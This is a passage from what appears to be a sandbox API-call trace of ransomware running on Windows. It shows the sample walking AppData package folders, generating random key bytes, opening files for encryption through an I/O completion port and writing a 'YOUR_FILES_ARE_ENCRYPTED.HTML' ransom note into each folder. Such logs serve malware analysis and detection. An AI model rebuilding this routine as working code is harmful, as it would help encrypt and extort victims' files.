pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings") returned 95 [0119.949] GetProcessHeap () returned 0x600000 [0119.949] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.949] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings" [0119.949] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\*" [0119.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8b023b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.949] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8b023b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.949] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec8b023b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8b023b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8b023b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.949] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.949] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 108 [0119.949] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.949] lstrlenW (lpString=".lock") returned 5 [0119.949] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.949] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.949] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.949] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat") returned 108 [0119.949] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.950] lstrlenW (lpString=".dat") returned 4 [0119.950] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.950] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.950] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0119.951] GetProcessHeap () returned 0x600000 [0119.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.953] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="88") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="31") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AB") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="61") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="AE") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="10") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="5B") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="42") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="C3") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D7") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="DC") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B2") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FC") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="C0") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="A7") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="11") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="BE") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E7") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="B9") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="34") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="90") returned 2 [0119.953] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="15") returned 2 [0119.953] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="62") returned 2 [0119.953] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F9") returned 2 [0119.954] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E4") returned 2 [0119.954] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E4") returned 2 [0119.954] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D8") returned 2 [0119.954] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="95") returned 2 [0119.954] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="EF") returned 2 [0119.954] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A4") returned 2 [0119.954] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="FA") returned 2 [0119.954] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0D") returned 2 [0119.954] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\settings.dat" [0119.954] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.954] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.954] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0119.954] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.954] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0119.954] GetProcessHeap () returned 0x600000 [0119.954] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.955] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.956] CloseHandle (hObject=0x320) returned 1 [0119.956] GetProcessHeap () returned 0x600000 [0119.956] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.956] GetProcessHeap () returned 0x600000 [0119.956] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.956] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec732afa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.957] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.957] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData") returned 100 [0119.957] GetProcessHeap () returned 0x600000 [0119.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.957] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData" [0119.957] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\*" [0119.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec732afa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.957] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec732afa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.957] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec732afa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec732afa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.957] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.957] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.957] GetProcessHeap () returned 0x600000 [0119.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.958] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.959] CloseHandle (hObject=0x320) returned 1 [0119.959] GetProcessHeap () returned 0x600000 [0119.959] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.959] GetProcessHeap () returned 0x600000 [0119.959] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.959] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.959] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.959] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState") returned 96 [0119.959] GetProcessHeap () returned 0x600000 [0119.959] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.959] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState" [0119.960] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\*" [0119.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.960] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.960] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.960] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.960] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0119.960] GetProcessHeap () returned 0x600000 [0119.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.961] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.961] CloseHandle (hObject=0x320) returned 1 [0119.962] GetProcessHeap () returned 0x600000 [0119.962] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.962] GetProcessHeap () returned 0x600000 [0119.962] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.962] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec70c8e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec70c8e4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.962] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.962] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0119.962] GetProcessHeap () returned 0x600000 [0119.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.962] WriteFile (in: hFile=0x214, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.963] CloseHandle (hObject=0x214) returned 1 [0119.963] GetProcessHeap () returned 0x600000 [0119.963] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.963] GetProcessHeap () returned 0x600000 [0119.963] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.965] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563adc86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsCalculator_8wekyb3d8bbwe", cAlternateFileName="MIB609~1.WIN")) returned 1 [0119.965] StrStrIW (lpFirst="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.965] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned 90 [0119.965] GetProcessHeap () returned 0x600000 [0119.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.966] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe" [0119.966] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\*") 